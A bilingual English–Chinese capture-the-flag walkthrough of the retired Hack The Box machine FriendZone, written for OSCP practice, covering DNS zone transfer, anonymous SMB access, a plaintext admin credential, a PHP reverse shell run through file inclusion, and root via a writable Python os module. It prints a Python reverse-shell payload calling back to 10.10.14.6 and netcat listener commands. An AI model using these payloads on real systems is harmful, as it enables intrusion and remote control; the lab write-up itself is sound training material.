This is the 14th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP like machines compiled by TJ_Null can be found here.

這是我將在退休的HTB計算機上發布的一系列博客中的第14個博客，以準備進行OSCP。 TJ_Null編譯的類似OSCP的計算機的完整列表可以在這里找到。

Let’s get started!

讓我們開始吧！

偵察 (Reconnaissance)

First thing first, we run a quick initial nmap scan to see which ports are open and which services are running on those ports.

首先，我們運行一次快速的nmap初始掃描，以查看哪些端口已打開以及哪些服務正在這些端口上運行。

nmap -sC -sV -O -oA initial 10.10.10.123

• -sC: run default nmap scripts

  -sC ：運行默認的nmap腳本

• -sV: detect service version

  -sV ：檢測服務版本

• -O: detect OS

  -O ：檢測操作系統

• -oA: output all formats and store in file initial

  -oA ：輸出所有格式并將其存儲在文件初始中

We get back the following result showing that seven ports are open:

我們返回以下結果，顯示七個端口處于打開狀態：

• Port 21: running ftp vsftpd 3.0.3

  端口21：運行ftp vsftpd 3.0.3

• Port 22: running OpenSSH 7.6p1 Ubuntu 4

  端口22 ：運行OpenSSH 7.6p1 Ubuntu 4

• Port 53: running ISC BIND 9.11.3–1ubuntu1.2 (DNS)

  端口53：運行ISC BIND 9.11.3–1ubuntu1.2(DNS)

• Ports 80 & 443: running Apache httpd 2.4.29

  端口80和443 ：運行Apache httpd 2.4.29

• Ports 139 and 145: Samba smbd 4.7.6-Ubuntu

  端口139和145： Samba Smbd 4.7.6-Ubuntu

Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-15 21:19 EST
Nmap scan report for 10.10.10.123
Host is up (0.030s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
...........
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=11/15%OT=21%CT=1%CU=40251%PV=Y%DS=2%DC=I%G=Y%TM=5DCF5C
OS:FC%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=104%TI=Z%CI=I%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: -48m45s, deviation: 1h09m16s, median: -8m46s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-11-16T04:11:17+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-11-15 21:11:17
|_ start_date: N/AOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.10 seconds

Before we start investigating these ports, let’s run more comprehensive nmap scans in the background to make sure we cover all bases.

在開始研究這些端口之前，讓我們在后臺運行更全面的nmap掃描，以確保我們涵蓋所有基礎。

Let’s run an nmap scan that covers all ports.

讓我們運行一個覆蓋所有端口的nmap掃描。

nmap -sC -sV -O -p- -oA full 10.10.10.123

We get back the following result. No other ports are open.

我們得到以下結果。 沒有其他端口打開。

Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-15 21:26 EST
Nmap scan report for 10.10.10.123
Host is up (0.030s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
..........
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=11/15%OT=21%CT=1%CU=31322%PV=Y%DS=2%DC=I%G=Y%TM=5DCF5E
OS:C4%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=102%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=FB%GCD=1%ISR=102%TI=Z%CI=I%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3
OS:=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7
OS:120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: -48m45s, deviation: 1h09m16s, median: -8m46s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2019-11-16T04:18:54+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-11-15 21:18:54
|_ start_date: N/AOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.93 seconds

Similarly, we run an nmap scan with the -sU flag enabled to run a UDP scan.

同樣，我們運行啟用-sU標志的nmap掃描以運行UDP掃描。

nmap -sU -O -p- -oA udp 10.10.10.123

I managed to root the box and write this blog while the UDP scan did not terminate. So instead I ran a scan for the top 1000 ports.

當UDP掃描未終止時，我設法使該框成為根目錄并撰寫了此博客。 因此，我掃描了前1000個端口。

Two ports are open.

兩個端口是開放的。

• Port 53: running DNS

  端口53：運行DNS

• Port 137: running SMB

  端口137：運行SMB

Before we move on to enumeration, let’s make a few mental notes about the nmap scan results.

在繼續進行枚舉之前，讓我們對nmap掃描結果進行一些心理記錄。

The -sC flag checks for anonymous login when it encounters an FTP port. Since the output did not include that anonymous login is allowed, then it’s likely that we’ll need credentials to access the FTP server. Moreover, the version is 3.0.3 which does not have any critical exploits (most FTP exploits are for version 2.x). So FTP is very unlikely to be our point of entry.

-sC標志在遇到FTP端口時檢查匿名登錄。 由于輸出未包括允許匿名登錄的信息，因此可能需要憑據才能訪問FTP服務器。 此外，該版本為3.0.3，沒有任何關鍵漏洞利用(大多數FTP漏洞針對2.x版)。 因此，FTP不太可能成為我們的切入點。

Similar to FTP, there isn’t many critical exploits associated with the version of SSH that is being used, so we’ll need credentials for this service as well.

與FTP相似，正在使用的SSH版本沒有很多關鍵的漏洞利用，因此我們也需要此服務的憑據。

Port 53 is open. The first thing we need to do for this service is get the domain name through nslookup and attempt a zone transfer to enumerate name servers, hostnames, etc. The ssl-cert from the nmap scan gives us the common name friendzone.red. This could be our domain name.

端口53打開。 我們需要為此服務做的第一件事是通過nslookup獲取域名，然后嘗試進行區域傳輸以枚舉名稱服務器，主機名等。nmap掃描中的ssl-cert為我們提供了通用名稱Friendzone.red。 這可能是我們的域名。

Ports 80 and 443 show different page titles. This could be a virtual hosts routing configuration. This means that if we discover other hosts we need to enumerate them over both HTTP and HTTPS since we might get different results.

端口80和443顯示不同的頁面標題。 這可能是虛擬主機路由配置。 這意味著，如果我們發現其他主機，則需要通過HTTP和HTTPS枚舉它們，因為我們可能會得到不同的結果。

SMB ports are open. We need to do the usual tasks: check for anonymous login, list shares and check permissions on shares.

SMB端口已打開。 我們需要執行常規任務：檢查匿名登錄，列出共享并檢查共享權限。

We have so many services to enumerate!

我們有很多服務可供枚舉！

枚舉 (Enumeration)

I always start off with enumerating HTTP first. In this case both 80 and 443 are open so we’ll start there.

我總是從首先枚舉HTTP開始。 在這種情況下，80和443都是打開的，因此我們將從此處開始。

Ports 80 & 443

端口80和443

Visit the site on the browser.

在瀏覽器上訪問該網站。

We can see the email is info@friendzoneportal.red. The friendzoneportal.red could be a possible domain name. We’ll keep it in mind when enumerating DNS.

我們可以看到電子郵件是info@friendzoneportal.red。 friendzoneportal.red可能是域名。 枚舉DNS時，請牢記這一點。

View the source code to see if we can find any other information.

查看源代碼以查看是否可以找到其他信息。

Nope. Next, run gobuster to enumerate directories.

不。 接下來，運行gobuster枚舉目錄。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.123

We get back the following result.

我們得到以下結果。

The /wordpress directory doesn’t reference any other links. So I ran gobuster on the /wordpress directory as well and didn’t get anything useful.

/ wordpress目錄未引用任何其他鏈接。 因此，我也在/ wordpress目錄上運行了gobuster，并且沒有得到任何有用的信息。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.123/wordpress

Visiting the site over HTTPS (port 443) gives us an error.

通過HTTPS(端口443)訪問站點會給我們帶來錯誤。

Therefore, let’s move on to enumerating DNS.

因此，讓我們繼續枚舉DNS。

Port 53

港口53

Try to get a domain name for the IP address using nslookup.

嘗試使用nslookup獲取IP地址的域名。

nslookup
server 10.10.10.123
10.10.10.123

We don’t get anything. However, we do have two possible domains from previous enumeration steps:

我們什么都沒有。 但是，從前面的枚舉步驟中我們確實有兩個可能的領域：

• friendzone.red from the nmap scan, and
  nmap掃描中的friendzone.red，以及
• friendzoneportal.red from the HTTP website
  HTTP網站上的friendzoneportal.red

Let’s try a zone transfer on both domains.

讓我們嘗試在兩個域上進行區域傳輸。

# zone transfer command: host -l <domain-name> <dns_server-address>
host -l friendzone.red 10.10.10.123 > zonetransfer.txt
host -l friendzoneportal.red 10.10.10.123 >> zonetransfer.txt

Open to the zonetransfer.txt file to see if we got any subdomains.

打開zonetransfer.txt文件，看看我們是否有任何子域。

Add all the domains/subdomains in the /hosts/etc file.

在/ hosts / etc文件中添加所有域/子域。

10.10.10.123 friendzone.red friendzoneportal.red admin.friendzoneportal.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red

Now we start visiting the subdomains we found. Remember that we have to visit them over both HTTP and HTTPS because we’re likely to get different results.

現在，我們開始訪問找到的子域。 請記住，我們必須同時通過HTTP和HTTPS訪問它們，因為我們可能會得到不同的結果。

The following sites showed us particularly interesting results.

以下網站向我們展示了特別有趣的結果。

https://admin.friendzoneportal.red/ and https://administrator1.friendzone.red/ have login forms.

https://admin.friendzoneportal.red/和https://administrator1.friendzone.red/具有登錄表單。

https://uploads.friendzone.red/ allows you to upload images.

https://uploads.friendzone.red/允許您上傳圖像。

I tried default credentials on the admin sites but that didn’t work. Before we run a password cracker on those two sites, let’s enumerate SMB. We might find credentials there.

我在管理網站上嘗試了默認憑據，但這沒有用。 在這兩個站點上運行密碼破解程序之前，讓我們列舉一下SMB。 我們可能在那里找到憑證。

Ports 139 & 445

139和445端口

Run smbmap to list available shares and permissions.

運行smbmap以列出可用的共享和權限。

smbmap -H 10.10.10.123

• -H: host

  -H ：主機

We get back the following result.

我們得到以下結果。

We have READ access on the general share and READ/WRITE access on the Development share. List the content of the shares.

我們對普通共享具有READ訪問權限，而對開發共享具有READ / WRITE訪問權限。 列出共享的內容。

smbmap -R -H 10.10.10.123

• -R: Recursively list directories and files on all accessible shares

  -R：遞歸列出所有可訪問共享上的目錄和文件

The Development share does not contain anything, but the general directory has a file named creds.txt! Before we download the file, let’s use smbclient to view more information about the shares.

開發共享不包含任何內容，但是常規目錄中有一個名為creds.txt的文件！ 在下載文件之前，讓我們使用smbclient查看有關共享的更多信息。

smbclient -L //10.10.10.123

• -L: look at what services are available on a server

  -L：查看服務器上可用的服務

The extra information this gives us over smbmap is the Comment column. We can see that the files in the Files share are stored in /etc/Files on the system. Therefore, there’s a good possibility that the files stored in the Development share (which we have WRITE access to) are stored in /etc/Development. We might need this piece of information in the exploitation phase.

通過smbmap提供給我們的其他信息是Comment列。 我們可以看到，文件共享中的文件存儲在系統上的/ etc / Files中。 因此，很有可能將存儲在開發共享中(我們具有WRITE訪問權限)的文件存儲在/ etc / Development中。 在開發階段，我們可能需要這些信息。

Let’s get the creds.txt file. First, login anonymously (without a password) into the general share.

讓我們獲取creds.txt文件。 首先，以匿名方式(無需密碼)登錄到常規共享。

smbclient //10.10.10.123/general -N

• -N: suppresses the normal password prompt from the client to the user

  -N：禁止從客戶端到用戶的普通密碼提示

Download the creds.txt file from the target machine to the attack machine.

將creds.txt文件從目標計算機下載到攻擊計算機。

get creds.txt

View the content of the file.

查看文件內容。

cat creds.txt

We have admin credentials!

我們有管理員憑據！

creds for the admin THING:admin:WORKWORKHhallelujah@#

Try the credentials on FTP.

嘗試使用FTP上的憑據。

Doesn’t work. Next, try SSH.

不起作用 接下來，嘗試SSH。

Also doesn’t work. Next, try it on the https://admin.friendzoneportal.red/ login form we found.

也行不通。 接下來，在找到的https://admin.friendzoneportal.red/登錄表單上嘗試。

Also doesn’t work. Next, try the credentials on the https://administrator1.friendzone.red/ login form.

也行不通。 接下來，嘗試使用https://administrator1.friendzone.red/登錄表單上的憑據。

We’re in! Visit the /dashboard.php page.

我們進來了！ 訪問/dashboard.php頁面。

It seems to be a page that allows you to view images on the site. We’ll try to gain initial access through this page.

它似乎是一個頁面，可讓您查看站點上的圖像。 我們將嘗試通過此頁面獲得初始訪問權限。

獲得初步立足點 (Gaining an Initial Foothold)

The dashboard.php page gives us instructions on how to view an image. We need to append the following to the URL.

dashboard.php頁面為我們提供了有關如何查看圖像的說明。 我們需要將以下內容附加到URL。

?image_id=a.jpg&pagename=timestamp

Let’s put that timestamp number in the pagename URL parameter. After we do that we no longer get a “Final Access timestamp…” message.

讓我們將該時間戳記數字放入pagename URL參數中。 完成之后，我們將不再收到“最終訪問時間戳…”消息。

During our enumeration phase, we found a URL https://uploads.friendzone.red/ that allows us to upload images. Let’s try and see if the images we upload there can be viewed through the dashboard page.

在枚舉階段，我們找到了一個URL https://uploads.friendzone.red/ ，該URL允許我們上傳圖像。 讓我們嘗試看看是否可以通過儀表板頁面查看上傳到那里的圖像。

When we successfully upload the image random.jpg we get a timestamp. Let’s use the image and timestamp on the dashboard page.

成功上傳圖像random.jpg時，將獲得一個時間戳。 讓我們在儀表板頁面上使用圖像和時間戳。

https://administrator1.friendzone.red/dashboard.php?image_id=random.jpg&pagename=1573957506

Nope, it doesn’t find the image. Let’s move our focus to the pagename parameter. It seems to be running a timestamp script that generates a timestamp and outputs it on the page. Based on the way the application is currently working, my gut feeling is that it takes the filename “timestamp” and appends “.php” to it and then runs that script. Therefore, if this is vulnerable to LFI, it would be difficult to disclose sensitive files since the “.php” extension will get added to my query.

不，它找不到圖像。 讓我們將焦點移到pagename參數。 似乎正在運行一個時間戳腳本，該腳本生成一個時間戳并將其輸出到頁面上。 基于應用程序當前的工作方式，我的直覺是它將文件名“ timestamp”并附加“ .php”并運行該腳本。 因此，如果這容易受到LFI的影響，則由于“ .php”擴展名將添加到我的查詢中，因此很難公開敏感文件。

Instead, let’s try first uploading a php file and then exploiting the LFI vulnerability to output something on the page. During the enumeration phase, we found that we have READ and WRITE permissions on the Development share and that it’s likely that the files uploaded on that share are stored in the location /etc/Development (based on the Comments column).

相反，讓我們嘗試首先上傳一個php文件，然后利用LFI漏洞在頁面上輸出內容。 在枚舉階段，我們發現我們對Development共享具有READ和WRITE權限，并且該共享上載的文件很可能存儲在/ etc / Development位置(基于Comments列)。

Let’s create a simple test.php script that outputs the string “It’s working!” on the page.

讓我們創建一個簡單的test.php腳本，該腳本輸出字符串“ It's work！”。 在頁面上。

<?php
echo "It's working!";
?>

Log into the Development share.

登錄到開發共享。

smbclient //10.10.10.123/Development -N

Download the test.php file from the attack machine to the share.

將test.php文件從攻擊機下載到共享。

put test.php

Test it on the site.

在現場進行測試。

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test

Remember not to include the .php extension since the application already does that for you.

請記住不要包含.php擴展名，因為該應用程序已經為您完成了。

Perfect, it’s working! The next step is to upload a php reverse shell. Grab the reverse shell from pentestmonkey and change the IP address and port configuration.

完美，正在運行！ 下一步是上傳一個PHP反向Shell。 抓住pentestmonkey的反向外殼，然后更改IP地址和端口配置。

Upload it in the same manner as we did with the test.php file. Then setup a listener on the attack machine.

以與處理test.php文件相同的方式上載它。 然后在攻擊機上設置一個偵聽器。

nc -nlvp 1234

Execute the reverse shell script from the website.

從網站執行反向Shell腳本。

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

We have a shell!

我們有殼！

Let’s upgrade it to a better shell.

讓我們將其升級到更好的外殼。

python -c 'import pty; pty.spawn("/bin/bash")'

This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (CTRL+ Z) and run the following in your terminal which tells your terminal to pass keyboard shortcuts to the shell.

這為我們提供了部分交互式的bash shell。 要獲得完全交互式的外殼程序，請在會話(CTRL + Z)中后臺運行，并在終端中運行以下命令，告訴您的終端將鍵盤快捷鍵傳遞給外殼程序。

stty raw -echo

Once that is done, run the command “fg” to bring netcat back to the foreground. Then use the following command to give the shell the ability to clear the screen.

完成后，運行命令“ fg”將netcat帶回到前臺。 然后，使用以下命令使Shell能夠清除屏幕。

export TERM=xterm

Now that we have an interactive shell, let’s see if we have enough privileges to get the user.txt flag.

現在我們有了一個交互式外殼，讓我們看看我們是否有足夠的特權來獲取user.txt標志。

cat home/friend/user.txt

We need to escalate privileges to get the root flag.

我們需要升級特權以獲取根標志。

特權提升 (Privilege Escalation)

We have rwx privileges on the /etc/Development directory as www-data. So let’s upload the LinEnum script in the Development share.

我們在/ etc / Development目錄中具有www-data的rwx特權。 因此，讓我們在“開發”共享中上載LinEnum腳本。

put LinEnum.sh

In the target machine, navigate to the /etc/Development directory.

在目標計算機上，導航到/ etc / Development目錄。

cd /etc/Development/

Give the script execute permissions.

授予腳本執行權限。

chmod +x LinEnum.sh

I don’t seem to have execute permissions in that directory, so I’ll copy it to the tmp directory.

我似乎在該目錄中沒有執行權限，因此將其復制到tmp目錄中。

cp LinEnum.sh /tmp/

Navigate to the /tmp directory and try again.

導航到/ tmp目錄，然后重試。

cd /tmp/
chmod +x LinEnum.sh

That works, so the next step is to execute the script.

那行得通，所以下一步就是執行腳本。

./LinEnum.sh

The results from LinEnum don’t give us anything that we could use to escalate privileges. So let’s try pspy. If you don’t have the script, you can download it from the following github repository.

LinEnum的結果沒有給我們提供任何可用于提升特權的東西。 因此，讓我們嘗試pspy。 如果沒有該腳本，則可以從以下github存儲庫下載該腳本。

https://github.com/DominicBreuker/pspy

Upload it and run it on the attack machine in the same way we did for LinEnum.

上載它并以與LinEnum相同的方式在攻擊機上運行它。

After a minute or two we see an interesting process pop up.

一兩分鐘后，我們看到一個有趣的過程彈出。

It seems that the reporter.py script is getting executed every couple of minutes as a scheduled task. Let’s view the permissions we have on that file.

似乎Reporter.py腳本作為計劃任務每??隔幾分鐘執行一次。 讓我們查看我們對該文件的權限。

ls -la /opt/server_admin/

We only have read permission. So let’s view the content of the file.

我們只有閱讀權限。 因此，讓我們查看文件的內容。

cat /opt/server_admin/reporter.py

Here’s the soure code of the script.

這是腳本的原始代碼。

#!/usr/bin/pythonimport osto_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"print "[+] Trying to send email to %s"%to_address#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''#os.system(command)# I need to edit the script later
# Sam ~ python developer

Most of the script is commented out so there isn’t much to do there. It does import the os module. Maybe we can hijack that. Locate the module on the machine.

大多數腳本已被注釋掉，因此沒有太多要做。 它確實導入os模塊。 也許我們可以劫持。 在機器上找到模塊。

locate os.py

Navigate to the directory and view the permissions on the file

導航到目錄并查看文件權限

cd /usr/lib/python2.7
ls -la | grep os.py

We have rwx privileges on the os.py module! This is obviously a security misconfiguration. As a non-privileged user, I should only have read access to the script. If we add a reverse shell to the script and wait for the root owned scheduled task to run, we’ll get back a reverse shell with root privileges!

我們在os.py模塊上具有rwx特權！ 顯然，這是安全配置錯誤。 作為非特權用戶，我應該只對該腳本具有讀取權限。 如果我們向腳本添加反向外殼程序并等待根擁有的計劃任務運行，我們將獲得具有根特權的反向外殼程序！

I tried accessing the os.py script using vi but the terminal was a bit screwed up. Here’s a way to fix it (courtesy of ippsec).

我嘗試使用vi訪問os.py腳本，但是終端有點混亂。 這是修復它的方法(由ippsec提供)。

Go to a new pane in the attack machine and enter the following command.

轉到攻擊機器中的新窗格，然后輸入以下命令。

stty -a

We need to set the rows to 29 and the columns to 113. Go back to the netcat session and run the following command.

我們需要將行設置為29，將列設置為113。返回到netcat會話并運行以下命令。

stty rows 29 columns 113

Even after this, vi was still a bit glitchy, so instead, I decided to download the os.py module to my attack machine using SMB, add the reverse shell there and upload it back to the target machine.

即使在此之后，vi仍然有些故障，因此，我決定使用SMB將os.py模塊下載到我的攻擊計算機上，在其中添加反向外殼并將其上傳回目標計算機。

Add the following reverse shell code to the bottom of the os.py file and upload it back to the target machine.

將以下反向Shell代碼添加到os.py文件的底部，并將其上傳回目標計算機。

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.6",1233));
dup2(s.fileno(),0);
dup2(s.fileno(),1);
dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

Setup a listener on the attack machine.

在攻擊機上設置偵聽器。

nc -nlvp 1233

Wait for the scheduled task to run the reporter.py script that will in turn call the os.py module which contains our reverse shell code.

等待安排好的任務運行report.py腳本，該腳本將依次調用os.py模塊，該模塊包含我們的反向Shell代碼。

We get back a shell running with root privileges! Grab the root.txt flag.

我們得到一個以root特權運行的shell！ 抓取root.txt標志。

得到教訓 (Lessons Learned)

To gain an initial foothold on the box we exploited six vulnerabilities.

為了獲得立足點，我們利用了六個漏洞。

The ability to perform a zone transfer which allowed us to get a list of all hosts for the domain. To prevent this vulnerability from occurring, the DNS server should be configured to only allow zone transfers from trusted IP addresses. It is worth noting that even if zone transfers are not allowed, it is still possible to enumerate the list of hosts through other (not so easy) means.

執行區域傳輸的能力使我們能夠獲取該域的所有主機的列表。 為防止發生此漏洞，DNS服務器應配置為僅允許從受信任IP地址進行區域傳輸。 值得注意的是，即使不允許區域傳輸，也可以通過其他(不太容易)方法枚舉主機列表。

Enabling anonymous login to an SMB share that contained sensitive information. This could have been avoided by disabling anonymous / guest access on SMB shares.

啟用匿名登錄到包含敏感信息的SMB共享。 可以通過禁用SMB共享上的匿名/來賓訪問來避免這種情況。

If anonymous login was not bad enough, one of the SMB shares also had WRITE access on it. This allowed us to upload a reverse shell. Again, restrictions should have been put in place on the SMB shares preventing access.

如果匿名登錄還不夠糟糕，則其中一個SMB共享也可以具有WRITE訪問權限。 這使我們可以上傳反向外殼。 同樣，應該在SMB共享上設置限制以阻止訪問。

Saving credentials in plaintext in a file on the system. This is unfortunately very common. Use a password manager if you’re having difficulty remembering your passwords.

將憑證以明文形式保存在系統上的文件中。 不幸的是，這很普遍。 如果您在記住密碼時遇到困難，請使用密碼管理器。

A Local File Inclusion (LFI) vulnerability that allowed us to execute a file on the system. Possible remediations include maintaining a white list of allowed files, sanitize input, etc.

本地文件包含(LFI)漏洞，使我們能夠在系統上執行文件。 可能的補救措施包括維護允許文件的白名單，清理輸入等。

Security misconfiguration that gave a web dameon user (www-data) the same permissions as a regular user on the system. I shouldn’t have been able to access the user.txt flag while running as a www-data user. The system administrator should have conformed to the principle of least privilege and the concept of separation of privileges.

安全性錯誤配置使Web dameon用戶(www-data)擁有與系統上常規用戶相同的權限。 以www-data用戶身份運行時，我不應該能夠訪問user.txt標志。 系統管理員應遵循最小特權原則和特權分離的概念。

To escalate privileges we exploited one vulnerability.

為了提升特權，我們利用了一個漏洞。

A security misconfiguration of a python module. There was a scheduled task that was run by root. The scheduled task ran a script that imported the os.py module. Usually, a regular user should only have read access to such modules, however it was configured as rwx access for everyone. Therefore, we used that to our advantage to hijack the python module and include a reverse shell that eventually ran with root privileges. It is common that such a vulnerability is introduced into a system when a user creates their own module and forgets to restrict write access to it or when the user decides to lessen restrictions on a current Python module. For this machine, we encountered the latter. The developer should have been very careful when deciding to change the default configuration of this specific module.

python模塊的安全性配置錯誤。 有一個由root運行的計劃任務。 計劃的任務運行了一個腳本，該腳本導入了os.py模塊。 通常，普通用戶只應具有對此類模塊的讀取訪問權限，但是將其配置為所有人的rwx訪問權限。 因此，我們利用它的優勢來劫持python模塊，并包含一個最終以root特權運行的反向shell。 當用戶創建自己的模塊而忘記限制對該模塊的寫訪問權，或者當用戶決定減少對當前Python模塊的限制時，通常會將這種漏洞引入系統。 對于這臺機器，我們遇到了后者。 在決定更改此特定模塊的默認配置時，開發人員應該非常小心。

結論 (Conclusion)

14 machines down, 33 more to go (if you’re wondering why the number of machines increased, it’s because TJ_Null recently updated the list)!

減少了14臺計算機，還有33臺(如果您想知道為什么增加計算機數量，這是因為TJ_Null最近更新了列表)！

翻譯自: https://medium.com/swlh/hack-the-box-friendzone-writeup-w-o-metasploit-fb52adc73c96

總結

以上是生活随笔為你收集整理的破解盒子的友友文章wo metasploit的全部內容，希望文章能夠幫你解決所遇到的問題。

